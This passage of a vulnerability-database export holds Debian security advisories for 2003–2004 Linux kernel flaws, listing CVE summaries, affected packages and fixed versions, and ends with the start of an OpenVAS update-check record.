certain packets that cause a large number of hash table collisions\n\nThis advisory provides updated 2.2.20 kernel source, and binary kernel images for the i386 architecture. Other architectures and kernel versions will be covered by separate advisories.\n\nFor the stable distribution (woody) on the i386 architecture, these problems have been fixed in kernel-source-2.2.20 version 2.2.20-5woody2 and kernel-image-i386 version 2.2.20-5woody3.\n\nFor the unstable distribution (sid) these problems are fixed in kernel-source-2.2.25 and kernel-image-2.2.25-i386 version 2.2.25-2.\n\nWe recommend that you update your kernel packages.\n\nNOTE: A system reboot will be required immediately after the upgrade in order to replace the running kernel. Remember to read carefully and follow the instructions given during the kernel upgrade process.\n\nNOTE: These kernels are not binary-compatible with the previous version. Any loadable modules will need to be recompiled in order to work with the new kernel.", "reporter": "Debian", "published": "2003-06-29T00:00:00", "title": "linux-kernel-2.2.20 -- several vulnerabilities", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "debian", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0248", "CVE-2003-0247", "CVE-2002-0429", "CVE-2003-0127", "CVE-2003-0364", "CVE-2003-0001", "CVE-2003-0246", "CVE-2003-0244", "CVE-2002-1380"], "modified": "2003-06-29T00:00:00", "href": "http://www.debian.org/security/dsa-336", "id": "DSA-336", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-02T18:28:21", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-1woody1", "packageFilename": "kernel-patch-2.4.18-powerpc_2.4.18-1woody1_all.deb", "arch": "all", "packageName": "kernel-patch-2.4.18-powerpc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-1woody1", "packageFilename": "kernel-patch-2.4.18-powerpc_2.4.18-1woody1.dsc", "arch": "src", "packageName": "kernel-patch-2.4.18-powerpc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-1woody1", "packageFilename": "kernel-image-2.4.18-powerpc-smp_2.4.18-1woody1_powerpc.deb", "arch": "ppc", "packageName": "kernel-image-2.4.18-powerpc-smp", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-1woody1", "packageFilename": "kernel-image-2.4.18-newpmac_2.4.18-1woody1_powerpc.deb", "arch": "ppc", "packageName": "kernel-image-2.4.18-newpmac", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-1woody1", "packageFilename": "kernel-image-2.4.18-powerpc_2.4.18-1woody1_powerpc.deb", "arch": "ppc", "packageName": "kernel-image-2.4.18-powerpc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-1woody1", "packageFilename": "kernel-patch-2.4.18-powerpc_2.4.18-1woody1.tar.gz", "arch": "src", "packageName": "kernel-patch-2.4.18-powerpc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.18-1woody1", "packageFilename": "kernel-headers-2.4.18_2.4.18-1woody1_powerpc.deb", "arch": "ppc", "packageName": "kernel-headers-2.4.18", "operator": "lt"}], "edition": 1, "description": "A number of vulnerabilities have been discovered in the Linux kernel.\n\nCVE-2002-0429: The iBCS routines in arch/i386/kernel/traps.c for Linux kernels 2.4.18 and earlier on x86 systems allow local users to kill arbitrary processes via a binary compatibility interface (lcall).\n\nCAN-2003-0001: Multiple ethernet Network Interface Card (NIC) device drivers do not pad frames with null bytes, which allows remote attackers to obtain information from previous packets or kernel memory by using malformed packets.\n\nCAN-2003-0127: The kernel module loader allows local users to gain root privileges by using ptrace to attach to a child process that is spawned by the kernel.\n\nCAN-2003-0244: The route cache implementation in Linux 2.4, and the Netfilter IP conntrack module, allows remote attackers to cause a denial of service (CPU consumption) via packets with forged source addresses that cause a large number of hash table collisions related to the PREROUTING chain.\n\nCAN-2003-0246: The ioperm system call in Linux kernel 2.4.20 and earlier does not properly restrict privileges, which allows local users to gain read or write access to certain I/O ports.\n\nCAN-2003-0247: Vulnerability in the TTY layer of the Linux kernel 2.4 allows attackers to cause a denial of service (\"kernel oops\").\n\nCAN-2003-0248: The mxcsr code in Linux kernel 2.4 allows attackers to modify CPU state registers via a malformed address.\n\nCAN-2003-0364: The TCP/IP fragment reassembly handling in the Linux kernel 2.4 allows remote attackers to cause a denial of service (CPU consumption) via certain packets that cause a large number of hash table collisions.\n\nThis advisory covers only the powerpc architecture. Other architectures will be covered by separate advisories.\n\nFor the stable distribution (woody) on the powerpc architecture, these problems have been fixed in version 2.4.18-1woody1.\n\nFor the unstable distribution (sid) these problems are fixed in version 2.4.20-2.\n\nWe recommend that you update your kernel packages.\n\nNOTE: A system reboot will be required immediately after the upgrade in order to replace the running kernel. Remember to read carefully and follow the instructions given during the kernel upgrade process.", "reporter": "Debian", "published": "2003-06-09T00:00:00", "type": "debian", "title": "kernel-patch-2.4.18-powerpc -- several vulnerabilities", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2003-0248", "CVE-2003-0247", "CVE-2002-0429", "CVE-2003-0127", "CVE-2003-0364", "CVE-2003-0001", "CVE-2003-0246", "CVE-2003-0244"], "modified": "2003-06-09T00:00:00", "id": "DSA-312", "href": "http://www.debian.org/security/dsa-312", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-02T18:29:54", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.17-0.020226.2.woody2", "arch": "mipsel", "packageFilename": "kernel-image-2.4.17-r3k-kn02_2.4.17-0.020226.2.woody2_mipsel.deb", "packageName": "kernel-image-2.4.17-r3k-kn02", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.17-0.020226.2.woody2", "arch": "mips", "packageFilename": "kernel-headers-2.4.17_2.4.17-0.020226.2.woody2_mips.deb", "packageName": "kernel-headers-2.4.17", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.17-1woody1", "arch": "hppa", "packageFilename": "mkcramfs_2.4.17-1woody1_hppa.deb", "packageName": "mkcramfs", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.17-1woody1", "arch": "src", "packageFilename": "kernel-source-2.4.17_2.4.17-1woody1.dsc", "packageName": "kernel-source-2.4.17", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.17-1woody1.diff", "arch": "src", "packageFilename": "kernel-source-2.4.17_2.4.17-1woody1.diff.gz", "packageName": "kernel-source-2.4.17", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.17-1woody1", "arch": "s390x", "packageFilename": "mkcramfs_2.4.17-1woody1_s390.deb", "packageName": "mkcramfs", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.17-1woody1", "arch": "m68k", "packageFilename": "mkcramfs_2.4.17-1woody1_m68k.deb", "packageName": "mkcramfs", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.17-1woody1", "arch": "alpha", "packageFilename": "mkcramfs_2.4.17-1woody1_alpha.deb", "packageName": "mkcramfs", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.17-0.020226.2.woody2", "arch": "src", "packageFilename": "kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody2.dsc", "packageName": "kernel-patch-2.4.17-mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.17-1woody1", "arch": "mipsel", "packageFilename": "mkcramfs_2.4.17-1woody1_mipsel.deb", "packageName": "mkcramfs", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.17-0.020226.2.woody2", "arch": "mipsel", "packageFilename": "kernel-image-2.4.17-r4k-kn04_2.4.17-0.020226.2.woody2_mipsel.deb", "packageName": "kernel-image-2.4.17-r4k-kn04", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.17-0.020226.2.woody2", "arch": "mips", "packageFilename": "kernel-image-2.4.17-r5k-ip22_2.4.17-0.020226.2.woody2_mips.deb", "packageName": "kernel-image-2.4.17-r5k-ip22", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.17-0.020226.2.woody2", "arch": "mipsel", "packageFilename": "kernel-headers-2.4.17_2.4.17-0.020226.2.woody2_mipsel.deb", "packageName": "kernel-headers-2.4.17", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.17-0.020226.2.woody2", "arch": "mipsel", "packageFilename": "mips-tools_2.4.17-0.020226.2.woody2_mipsel.deb", "packageName": "mips-tools", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.17-1woody1", "arch": "all", "packageFilename": "kernel-source-2.4.17_2.4.17-1woody1_all.deb", "packageName": "kernel-source-2.4.17", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.17.orig", "arch": "src", "packageFilename": "kernel-source-2.4.17_2.4.17.orig.tar.gz", "packageName": "kernel-source-2.4.17", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.17-1woody1", "arch": "mips", "packageFilename": "mkcramfs_2.4.17-1woody1_mips.deb", "packageName": "mkcramfs", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.17-1woody1", "arch": "ppc", "packageFilename": "mkcramfs_2.4.17-1woody1_powerpc.deb", "packageName": "mkcramfs", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.17-1woody1", "arch": "arm", "packageFilename": "mkcramfs_2.4.17-1woody1_arm.deb", "packageName": "mkcramfs", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.17-1woody1", "arch": "all", "packageFilename": "kernel-doc-2.4.17_2.4.17-1woody1_all.deb", "packageName": "kernel-doc-2.4.17", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.17-0.020226.2.woody2", "arch": "src", "packageFilename": "kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody2.tar.gz", "packageName": "kernel-patch-2.4.17-mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.17-0.020226.2.woody2", "arch": "all", "packageFilename": "kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody2_all.deb", "packageName": "kernel-patch-2.4.17-mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.17-1woody1", "arch": "i686", "packageFilename": "mkcramfs_2.4.17-1woody1_i386.deb", "packageName": "mkcramfs", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.17-1woody1", "arch": "ia64", "packageFilename": "mkcramfs_2.4.17-1woody1_ia64.deb", "packageName": "mkcramfs", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.17-0.020226.2.woody2", "arch": "mips", "packageFilename": "kernel-image-2.4.17-r4k-ip22_2.4.17-0.020226.2.woody2_mips.deb", "packageName": "kernel-image-2.4.17-r4k-ip22", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.17-1woody1", "arch": "sparc", "packageFilename": "mkcramfs_2.4.17-1woody1_sparc.deb", "packageName": "mkcramfs", "operator": "lt"}], "description": "A number of vulnerabilities have been discovered in the Linux kernel.\n\n * [CVE-2002-0429](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0429>): The iBCS routines in arch/i386/kernel/traps.c for Linux kernels 2.4.18 and earlier on x86 systems allow local users to kill arbitrary processes via a binary compatibility interface (lcall) \n * [CAN-2003-0001](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0001>): Multiple ethernet Network Interface Card (NIC) device drivers do not pad frames with null bytes, which allows remote attackers to obtain information from previous packets or kernel memory by using malformed packets \n * [CAN-2003-0127](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0127>): The kernel module loader allows local users to gain root privileges by using ptrace to attach to a child process that is spawned by the kernel \n * [CAN-2003-0244](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0244>): The route cache implementation in Linux 2.4, and the Netfilter IP conntrack module, allows remote attackers to cause a denial of service (CPU consumption) via packets with forged source addresses that cause a large number of hash table collisions related to the PREROUTING chain \n * [CAN-2003-0246](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0246>): The ioperm system call in Linux kernel 2.4.20 and earlier does not properly restrict privileges, which allows local users to gain read or write access to certain I/O ports. \n * [CAN-2003-0247](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0247>): vulnerability in the TTY layer of the Linux kernel 2.4 allows attackers to cause a denial of service (\"kernel oops\") \n * [CAN-2003-0248](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0248>): The mxcsr code in Linux kernel 2.4 allows attackers to modify CPU state registers via a malformed address. \n * [CAN-2003-0364](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0364>): The TCP/IP fragment reassembly handling in the Linux kernel 2.4 allows remote attackers to cause a denial of service (CPU consumption) via certain packets that cause a large number of hash table collisions \n\nThis advisory provides corrected source code for Linux 2.4.17, and corrected binary kernel images for the mips and mipsel architectures. Other versions and architectures will be covered by separate advisories.\n\nFor the stable distribution (woody), these problems have been fixed in kernel-source-2.4.17 version 2.4.17-1woody1 and kernel-patch-2.4.17-mips version 2.4.17-0.020226.2.woody2.\n\nFor the unstable distribution (sid) these problems are fixed in kernel-source-2.4.20 version 2.4.20-8.\n\nWe recommend that you update your kernel packages.\n\nNOTE: A system reboot will be required immediately after the upgrade in order to replace the running kernel. Remember to read carefully and follow the instructions given during the kernel upgrade process.", "edition": 1, "reporter": "Debian", "published": "2003-06-27T00:00:00", "title": "linux-kernel-2.4.17 -- several vulnerabilities", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "debian", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0248", "CVE-2003-0247", "CVE-2002-0429", "CVE-2003-0127", "CVE-2003-0364", "CVE-2003-0001", "CVE-2003-0246", "CVE-2003-0244"], "modified": "2003-06-27T00:00:00", "id": "DSA-332", "href": "http://www.debian.org/security/dsa-332", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-02T18:19:42", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.0.20020816-0.woody.2", "packageName": "kernel-patch-2.4.17-s390", "arch": "all", "packageFilename": "kernel-patch-2.4.17-s390_0.0.20020816-0.woody.2_all.deb", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.17-2.woody.3", "packageName": "kernel-image-2.4.17-s390", "arch": "src", "packageFilename": "kernel-image-2.4.17-s390_2.4.17-2.woody.3.dsc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.0.20020816-0.woody.2", "packageName": "kernel-patch-2.4.17-s390", "arch": "src", "packageFilename": "kernel-patch-2.4.17-s390_0.0.20020816-0.woody.2.dsc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.17-2.woody.3", "packageName": "kernel-headers-2.4.17", "arch": "s390x", "packageFilename": "kernel-headers-2.4.17_2.4.17-2.woody.3_s390.deb", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.0.20020816.orig", "packageName": "kernel-patch-2.4.17-s390", "arch": "src", "packageFilename": "kernel-patch-2.4.17-s390_0.0.20020816.orig.tar.gz", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.0.20020816-0.woody.2.diff", "packageName": "kernel-patch-2.4.17-s390", "arch": "src", "packageFilename": "kernel-patch-2.4.17-s390_0.0.20020816-0.woody.2.diff.gz", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.17-2.woody.3", "packageName": "kernel-image-2.4.17-s390", "arch": "src", "packageFilename": "kernel-image-2.4.17-s390_2.4.17-2.woody.3.tar.gz", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "2.4.17-2.woody.3", "packageName": "kernel-image-2.4.17-s390", "arch": "s390x", "packageFilename": "kernel-image-2.4.17-s390_2.4.17-2.woody.3_s390.deb", "operator": "lt"}], "edition": 1, "description": "Several security related problems have been fixed in the Linux kernel 2.4.17 used for the S/390 architecture, mostly by backporting fixes from 2.4.18 and incorporating recent security fixes. The corrections are listed below with the identification from the Common Vulnerabilities and Exposures (CVE) project:\n\n * [CVE-2002-0429](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0429>): \n\nThe iBCS routines in arch/i386/kernel/traps.c for Linux kernels 2.4.18 and earlier on x86 systems allow local users to kill arbitrary processes via a binary compatibility interface (lcall).\n\n * [CAN-2003-0001](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0001>): \n\nMultiple ethernet network interface card (NIC) device drivers do not pad frames with null bytes, which allows remote attackers to obtain information from previous packets or kernel memory by using malformed packets, as demonstrated by Etherleak.\n\n * [CAN-2003-0244](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0244>): \n\nThe route cache implementation in Linux 2.4, and the Netfilter IP conntrack module, allows remote attackers to cause a denial of service (CPU consumption) via packets with forged source addresses that cause a large number of hash table collisions related to the PREROUTING chain.\n\n * [CAN-2003-0246](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0246>): \n\nThe ioperm system call in Linux kernel 2.4.20 and earlier does not properly restrict privileges, which allows local users to gain read or write access to certain I/O ports.\n\n * [CAN-2003-0247](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0247>): \n\nA vulnerability in the TTY layer of the Linux kernel 2.4 allows attackers to cause a denial of service (\"kernel oops\").\n\n * [CAN-2003-0248](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0248>): \n\nThe mxcsr code in Linux kernel 2.4 allows attackers to modify CPU state registers via a malformed address.\n\n * [CAN-2003-0364](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0364>): \n\nThe TCP/IP fragment reassembly handling in the Linux kernel 2.4 allows remote attackers to cause a denial of service (CPU consumption) via certain packets that cause a large number of hash table collisions.\n\n * [CAN-2003-0961](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0961>): \n\nAn integer overflow in brk() system call (do_brk() function) for Linux allows a local attacker to gain root privileges. Fixed upstream in Linux 2.4.23.\n\n * [CAN-2003-0985](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0985>): \n\nPaul Starzetz [discovered](<http://isec.pl/vulnerabilities/isec-0013-mremap.txt>) a flaw in bounds checking in mremap() in the Linux kernel (present in version 2.4.x and 2.6.x) which may allow a local attacker to gain root privileges. Version 2.2 is not affected by this bug. Fixed upstream in Linux 2.4.24.\n\n * [CAN-2004-0077](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0077>): \n\nPaul Starzetz and Wojciech Purczynski of isec.pl [discovered](<http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt>) a critical security vulnerability in the memory management code of Linux inside the mremap(2) system call. Due to missing function return value check of internal functions a local attacker can gain root privileges. Fixed upstream in Linux 2.4.25 and 2.6.3.\n\nFor the stable distribution (woody) these problems have been fixed in version 2.4.17-2.woody.3 of s390 images and in version 0.0.20020816-0.woody.2 of the patch packages.\n\nFor the unstable distribution (sid) these problems will be fixed soon.\n\nWe recommend that you upgrade your Linux kernel packages immediately.\n\n[Vulnerability matrix](<CAN-2004-0077>) for CAN-2004-0077", "reporter": "Debian", "published": "2004-02-19T00:00:00", "title": "linux-kernel-2.4.17-s390 -- several vulnerabilities", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "debian", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0248", "CVE-2003-0961", "CVE-2003-0247", "CVE-2002-0429", "CVE-2003-0985", "CVE-2003-0364", "CVE-2003-0001", "CVE-2003-0246", "CVE-2003-0244", "CVE-2004-0077"], "modified": "2004-02-19T00:00:00", "href": "http://www.debian.org/security/dsa-442", "id": "DSA-442", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-02T18:30:30", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "011226.15", "arch": "ia64", "packageFilename": "kernel-image-2.4.17-itanium-smp_011226.15_ia64.deb", "packageName": "kernel-image-2.4.17-itanium-smp", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "011226.15", "arch": "ia64", "packageFilename": "kernel-headers-2.4.17-ia64_011226.15_ia64.deb", "packageName": "kernel-headers-2.4.17-ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "011226.15", "arch": "all", "packageFilename": "kernel-source-2.4.17-ia64_011226.15_all.deb", "packageName": "kernel-source-2.4.17-ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "011226.15", "arch": "src", "packageFilename": "kernel-image-2.4.17-ia64_011226.15.dsc", "packageName": "kernel-image-2.4.17-ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "011226.15", "arch": "src", "packageFilename": "kernel-image-2.4.17-ia64_011226.15.tar.gz", "packageName": "kernel-image-2.4.17-ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "011226.15", "arch": "ia64", "packageFilename": "kernel-image-2.4.17-mckinley_011226.15_ia64.deb", "packageName": "kernel-image-2.4.17-mckinley", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "011226.15", "arch": "ia64", "packageFilename": "kernel-image-2.4.17-itanium_011226.15_ia64.deb", "packageName": "kernel-image-2.4.17-itanium", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "011226.15", "arch": "ia64", "packageFilename": "kernel-image-2.4.17-mckinley-smp_011226.15_ia64.deb", "packageName": "kernel-image-2.4.17-mckinley-smp", "operator": "lt"}], "description": "The IA-64 maintainers fixed several security related bugs in the Linux kernel 2.4.17 used for the IA-64 architecture, mostly by backporting fixes from 2.4.18. The corrections are listed below with the identification from the Common Vulnerabilities and Exposures (CVE) project:\n\n * [CAN-2003-0001](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0001>): \n\nMultiple ethernet network interface card (NIC) device drivers do not pad frames with null bytes, which allows remote attackers to obtain information from previous packets or kernel memory by using malformed packets, as demonstrated by Etherleak.\n\n * [CAN-2003-0018](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0018>): \n\nLinux kernel 2.4.10 through 2.4.21-pre4 does not properly handle the O_DIRECT feature, which allows local attackers with write privileges to read portions of previously deleted files, or cause file system corruption.\n\n * [CAN-2003-0127](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0127>): \n\nThe kernel module loader in Linux kernel 2.2.x before 2.2.25, and 2.4.x before 2.4.21, allows local users to gain root privileges by using ptrace to attach to a child process which is spawned by the kernel.\n\n * [CAN-2003-0461](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0461>): \n\nThe virtual file /proc/tty/driver/serial in Linux 2.4.x reveals the exact number of characters used in serial links, which could allow local users to obtain potentially sensitive information such as the length of passwords.\n\n * [CAN-2003-0462](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0462>): \n\nA race condition in the way env_start and env_end pointers are initialized in the execve system call and used in fs/proc/base.c on Linux 2.4 allows local users to cause a denial of service (crash).\n\n * [CAN-2003-0476](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0476>): \n\nThe execve system call in Linux 2.4.x records the file descriptor of the executable process in the file table of the calling process, which allows local users to gain read access to restricted file descriptors.\n\n * [CAN-2003-0501](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0501>): \n\nThe /proc filesystem in Linux allows local users to obtain sensitive information by opening various entries in /proc/self before executing a setuid program, which causes the program to fail to change the ownership and permissions of those entries.\n\n * [CAN-2003-0550](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0550>): \n\nThe STP protocol, as enabled in Linux 2.4.x, does not provide sufficient security by design, which allows attackers to modify the bridge topology.\n\n * [CAN-2003-0551](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0551>): \n\nThe STP protocol implementation in Linux 2.4.x does not properly verify certain lengths, which could allow attackers to cause a denial of service.\n\n * [CAN-2003-0552](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0552>): \n\nLinux 2.4.x allows remote attackers to spoof the bridge Forwarding table via forged packets whose source addresses are the same as the target.\n\n * [CAN-2003-0961](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0961>): \n\nAn integer overflow in brk system call (do_brk function) for Linux kernel 2.4.22 and earlier allows local users to gain root privileges.\n\n * [CAN-2003-0985](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0985>): \n\nThe mremap system call (do_mremap) in Linux kernel 2.4 and 2.6 does not properly perform boundary checks, which allows local users to cause a denial of service and possibly gain privileges by causing a remapping of a virtual memory area (VMA) to create a zero length VMA.\n\nFor the stable distribution (woody) this problem has been fixed in version kernel-image-2.4.17-ia64 for the ia64 architecture. Other architectures are already or will be fixed separately.\n\nFor the unstable distribution (sid) this problem will be fixed soon with newly uploaded packages.", "edition": 1, "reporter": "Debian", "published": "2004-01-15T00:00:00", "title": "linux-kernel-2.4.17-ia64 -- several vulnerabilities", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "debian", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0961", "CVE-2003-0461", "CVE-2003-0985", "CVE-2003-0127", "CVE-2003-0001", "CVE-2003-0501", "CVE-2003-0552", "CVE-2003-0476", "CVE-2003-0462", "CVE-2003-0018", "CVE-2003-0551", "CVE-2003-0550"], "modified": "2004-01-15T00:00:00", "id": "DSA-423", "href": "http://www.debian.org/security/dsa-423", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-24T12:50:03", "references": [], "pluginID": "53601", "description": "The remote host is missing an update to kernel-patch-2.4.18-powerpc\nannounced via advisory DSA 312-1.", "edition": 2, "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "published": "2008-01-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "Debian Security Advisory DSA 312-1 (kernel-patch-2.4.18-powerpc)", "type": "openvas", "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0248", "CVE-2003-0247", "CVE-2002-0429", "CVE-2003-0127", "CVE-2003-0364", "CVE-2003-0001", "CVE-2003-0246", "CVE-2003-0244"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53601", "id": "OPENVAS:53601", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_312_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 312-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A number of vulnerabilities have been discovered in the Linux kernel.\n\n- - CVE-2002-0429: The iBCS routines in arch/i386/kernel/traps.c for\nLinux kernels 2.4.18 and earlier on x86 systems allow local users to\nkill arbitrary processes via a a binary compatibility interface\n(lcall)\n\n- - CVE-2003-0001: Multiple ethernet Network Interface Card (NIC) device\ndrivers do not pad frames with null bytes, which allows remote\nattackers to obtain information from previous 